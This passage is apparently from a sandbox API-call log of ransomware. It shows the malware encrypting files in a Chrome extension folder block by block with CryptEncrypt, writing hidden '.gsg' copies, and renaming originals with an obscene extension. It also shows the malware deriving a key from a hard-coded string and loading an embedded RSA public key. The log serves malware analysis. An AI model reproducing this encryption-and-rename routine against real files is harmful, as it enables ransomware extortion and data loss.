Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.301] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.301] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.302] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.302] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.302] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.302] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.302] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.302] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.302] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.303] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.303] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.303] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.303] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.303] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.304] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.304] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.304] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.304] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.304] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.304] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.304] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.305] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.305] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.305] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.305] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.305] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.306] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.306] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.306] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.306] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.306] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.306] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.306] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.306] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.306] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.306] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.306] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0xe1, lpOverlapped=0x0) returned 1 [0261.306] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xe1, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0xf0) returned 1 [0261.306] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0xf0, lpOverlapped=0x0) returned 1 [0261.306] CloseHandle (hObject=0x5d64) returned 1 [0261.306] CloseHandle (hObject=0x5d50) returned 1 [0261.307] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), bFailIfExists=0) returned 1 [0261.310] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html", dwFileAttributes=0x0) returned 1 [0261.312] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.gsg")) returned 1 [0261.313] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.fuck")) returned 1 [0261.314] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0261.314] CryptDestroyKey (hKey=0x2e7fd40) returned 1 [0261.314] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0261.314] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.314] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.314] GetLastError () returned 0x0 [0261.314] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js")) returned 0x20 [0261.314] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js", dwFileAttributes=0x80) returned 1 [0261.315] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.315] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.316] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.gsg", dwFileAttributes=0x2) returned 1 [0261.316] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.318] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.318] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.318] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.318] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fc40) returned 1 [0261.318] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.318] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.318] CryptAcquireContextA (in: phProv=0x2b9c388, 